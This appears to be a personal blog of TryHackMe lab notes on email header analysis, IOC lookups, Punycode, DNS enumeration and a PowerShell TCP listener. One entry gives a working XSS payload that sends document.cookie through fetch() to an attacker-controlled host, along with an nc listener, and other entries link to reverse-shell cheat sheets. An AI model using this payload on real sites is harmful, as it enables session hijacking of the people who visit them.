Thursday, February 20, 2025

[TryHackMe] Email Header Analysis

1. X-Originating-IP - The IP address the email was sent from (this is known as an X-header)


2. smtp.mailfrom/header.from - The domain the email was sent from (these fields appear within the Authentication-Results header)


3. Reply-To - The email address that replies are sent to, instead of the From address


Reference: https://web.archive.org/web/20221219232959/https://mediatemple.net/community/products/all/204643950/understanding-an-email-header
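
The three headers above can be pulled out of a raw message with Python's standard email module and compared against the visible From address. This is an added example, not part of the original notes; the sample message, its domains and the function names are constructed for illustration.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample (not a real message): documentation IPs and example domains.
SAMPLE = """\
Authentication-Results: mx.example.org;
 spf=pass smtp.mailfrom=bounce.example.net;
 dmarc=pass header.from=example.net
X-Originating-IP: [198.51.100.23]
From: "Billing" <billing@example.net>
Reply-To: billing-desk@example.com
Subject: Invoice

(body omitted)
"""

def domain_of(value):
    """Lowercased domain of an address header value ('' if absent)."""
    return parseaddr(value or "")[1].rpartition("@")[2].lower()

def analyze(raw):
    """Extract the sender-related headers and flag mismatches worth a closer look."""
    msg = message_from_string(raw)
    # Unfold the multi-line Authentication-Results header into one line.
    auth = " ".join((msg.get("Authentication-Results") or "").split())

    def auth_prop(name):
        # Values may be a bare domain or a full address; keep only the domain.
        m = re.search(r"\b" + re.escape(name) + r"=([^\s;]+)", auth)
        return m.group(1).rpartition("@")[2].lower() if m else None

    info = {
        "originating_ip": (msg.get("X-Originating-IP") or "").strip(" []") or None,
        "smtp_mailfrom": auth_prop("smtp.mailfrom"),
        "header_from": auth_prop("header.from"),
        "from_domain": domain_of(msg.get("From")),
        "reply_to_domain": domain_of(msg.get("Reply-To")),
    }
    flags = []
    if info["reply_to_domain"] and info["reply_to_domain"] != info["from_domain"]:
        flags.append("Reply-To domain differs from From domain")
    if info["header_from"] and info["header_from"] != info["from_domain"]:
        flags.append("header.from differs from the visible From domain")
    return info, flags

if __name__ == "__main__":
    info, flags = analyze(SAMPLE)
    for key, value in info.items():
        print(f"{key}: {value}")
    for flag in flags:
        print("FLAG:", flag)
```

A differing Reply-To domain is not proof of phishing on its own, but it is a cheap signal to surface during triage.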

Wednesday, February 19, 2025

[TryHackMe] Fuzzy Hashing

 https://ssdeep-project.github.io/ssdeep/index.html

How to hide Caller ID

 Dial "*67" as a prefix.

[TryHackMe] URL Shortener



Common URL shorteners include the following.


bit.ly

goo.gl

ow.ly

s.id

smarturl.it

tiny.pl

tinyurl.com

x.co


Append "+" to the shortened URL to see the original URL.

[TryHackMe] Punycode

 Example:

The URL above shows adıdas.de, whose Punycode form is http://xn--addas-o4a.de/


Tool:

Punycode can be inserted through Microsoft Word.


Punycode translator:

https://www.punycoder.com/


Sunday, February 16, 2025

[TryHackMe] IOC Search

 https://metadefender.com/


https://talosintelligence.com/


https://www.virustotal.com/gui/home/upload


https://intelligence.any.run/analysis/lookup


https://bazaar.abuse.ch/browse/


https://malshare.com/search.php


PS: Obtain SHA256 under Windows

#CertUtil -hashfile [FILENAME] SHA256

[TryHackMe] Shellcode/Payload

 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md


https://web.archive.org/web/20200901140719/http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet


https://github.com/danielmiessler/SecLists

Thursday, February 13, 2025

[TryHackMe] SearchSploit

 Update Searchsploit

# searchsploit -u


Search exploits

# searchsploit KEYWORD

Friday, February 7, 2025

[TryHackMe] Cookie Hijacking through XSS

 XSS Payload:

</textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script>


Listening side:

#nc -nvlp PORT_NUMBER

Thursday, January 23, 2025

[PowerShell] A script to listen on a given TCP port

 # Manually execute "Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope Process"

# Name this file as Listen-TCP.ps1

param (
    [int]$Port = 8080  # Default port is 8080, you can specify another port when running the script
)

$gsock = {
	# Create a TCP listener on the specified port
	$listener = [System.Net.Sockets.TcpListener]$Port
	$listener.Start()

	Write-Host "Listening on port $Port..."

	try {
		while ($true) {
			# Accept a client connection
			$client = $listener.AcceptTcpClient()
			Write-Host "Client connected!"

			# Get the network stream for reading data
			$stream = $client.GetStream()

			# Set up a reader to read from the stream
			$reader = New-Object System.IO.StreamReader($stream)

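			# Read line by line until the client closes the connection
			# (ReadLine returns $null at end of stream; Peek() returns -1, which is truthy)
			while ($null -ne ($data = $reader.ReadLine())) {
				Write-Host "Received: $data"
			}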

			# Close the client connection
			$reader.Close()
			$client.Close()
		}
	}
	catch {
		Write-Host "Error: $_"
	}
	finally {
		# Stop the listener when done
		$listener.Stop()
		Write-Host "Listener stopped."
		.$gsock
	}
}

&$gsock
# .\Listen-TCP.ps1 -Port 9090

Tuesday, January 21, 2025

[certificate] ISO/IEC 27001:2022 LA

 


[TryHackMe] DNS Enumeration

 1) CA's Certificate Transparency logs

Use https://crt.sh/ to search the domain.


2) Google Hacking

Utilize the keywords, "site" and "inurl".


3) Employing the tool, dnsrecon

# dnsrecon -t brt -d DOMAIN


4) Employing another tool, sublist3r.py

# sublist3r.py -d DOMAIN


5) Leveraging Virtual Host through the tool, ffuf

# ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.DOMAIN" -u http://IP